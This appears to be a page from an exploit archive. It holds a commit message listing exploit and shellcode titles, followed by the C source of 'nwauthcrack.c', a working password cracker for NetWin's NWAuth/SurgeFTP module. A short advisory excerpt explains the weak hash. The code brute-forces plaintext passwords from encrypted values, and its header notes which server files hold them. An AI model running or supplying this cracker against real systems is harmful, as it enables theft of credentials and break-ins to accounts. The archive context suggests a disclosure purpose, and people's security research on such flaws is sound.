880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
83 lines
No EOL
3 KiB
C
83 lines
No EOL
3 KiB
C
// source: https://www.securityfocus.com/bid/3075/info
|
|
|
|
The Netwin Authentication module, or NWAuth, is an external authentication module used by several Netwin products.
|
|
|
|
A simple one-way hash function is used by NWAuth to perform password encryption operations. As a result, it is trivial for an attacker to compose a list of possible plaintext values or perform some other brute force attack against the data encrypted using the scheme.
|
|
|
|
/********************************************************************
|
|
* nwauthcrack.c - NetWin Authentication Module password cracker *
|
|
* the SurgeFTP encrypted passwords can be found in the admin.dat & *
|
|
* nwauth.clg files in the nwauth.exe directory *
|
|
* by [ByteRage] <byterage@yahoo.com> [http://www.byterage.cjb.net] *
|
|
********************************************************************/
|
|
|
|
#include <string.h>
|
|
#include <stdio.h>
|
|
|
|
FILE *fh;
|
|
/* the following table indices refer to the characters our
|
|
generated password may consist of (true/false), since
|
|
we don't want to go into too much trouble when typing
|
|
everything in :) */
|
|
const char okaychars[256] = {
|
|
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
|
|
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
|
|
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
|
|
1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,
|
|
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
|
|
1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,
|
|
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
|
|
1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,
|
|
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
|
|
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
|
|
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
|
|
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
|
|
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
|
|
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
|
|
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
|
|
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
|
|
};
|
|
|
|
/* DECRYPTION ALGORITHMS */
|
|
int enumpwds(unsigned char encrypted[]) {
|
|
int heavycrypt0;
|
|
unsigned int num=0, i, x;
|
|
unsigned char j[256], decrypted[256];
|
|
for(i=0; i<256;i++) { j[i] = 0; }
|
|
brute:
|
|
heavycrypt0 = (unsigned char)encrypted[1]*255+(unsigned char)encrypted[0];
|
|
for(i=0; i+2 < strlen(encrypted); i++) {
|
|
for(x=j[i]; x < 256; x++) {
|
|
if ((x * (heavycrypt0+1) % 40 == (encrypted[i+2]-0x41)) & okaychars[x]) {
|
|
decrypted[i] = x;
|
|
break;
|
|
}
|
|
}
|
|
if (x == 256) {
|
|
next:
|
|
if (i == 0) return num;
|
|
if (j[i-1] < 256) { j[i-1] = decrypted[i-1]+1; x = i; } else { i--; goto next; }
|
|
for (i=x; i < 256; i++) { j[i] = 0; }
|
|
goto brute;
|
|
}
|
|
heavycrypt0 += x; heavycrypt0 *= 3; heavycrypt0 %= 0x7D00;
|
|
}
|
|
decrypted[i] = '\x00';
|
|
num++;
|
|
printf("%s\n", decrypted);
|
|
if (j[i-1] < 256) { j[i-1] = decrypted[i-1]+1; x = i; } else { i--; goto next; }
|
|
for (i=x; i < 256; i++) { j[i] = 0; }
|
|
goto brute;
|
|
}
|
|
/* DECRYPTION ALGORITHMS END */
|
|
|
|
void main(int argc, char ** argv) {
|
|
char buf[256]; int k, l;
|
|
|
|
printf("NetWin Authentication Module password cracker by [ByteRage]\n\n");
|
|
|
|
if (argc < 2) { printf("Syntax : %s <password>\n", argv[0]); return; }
|
|
printf("%s ->\n",argv[1]);
|
|
|
|
printf("\n%d passwords found for %s\n",enumpwds(argv[1]),argv[1]);
|
|
} |